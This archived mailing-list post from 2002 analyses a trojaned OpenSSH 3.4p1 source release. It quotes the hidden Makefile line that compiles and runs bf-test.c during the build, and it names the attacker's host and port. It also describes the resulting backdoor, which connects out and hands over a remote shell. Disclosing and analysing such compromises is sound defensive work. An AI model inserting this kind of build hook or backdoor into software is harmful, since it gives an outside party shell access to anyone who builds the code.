Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

firewall-wizards logo Firewall Wizards mailing list archives

Re: OpenSSH 3.4p1 possibly trojaned
From: hennings () skiinfo com
Date: 01 Aug 2002 14:46:44 +0200

| It would appear that the OpenSSH code for all the non-OpenBSD systems was 
| trojaned at some point pretty recently.

(...)
|  all: libopenbsd-compat.a
| +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh 
| ./bf-test.out &
| 
| Trojan connection:
| 
| 203.62.158.32:6667 (web.snsonline.net)

More details:

The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to to a shell script in the current directory
and then run from the Makefile.

The generated script contains some C code, which is compiled and then
run.

It's forking, connecting to 203.62.158.32:6667, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)

Regards

Henning Spjelkavik
-- 
Skiinfo AS
Christian Krohgsgate 60     Fax:        22114011
0186 Oslo                   Foretaksnr: 976036859
 
http://www.webinfo.no/      E-mail:   info () webinfo no
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]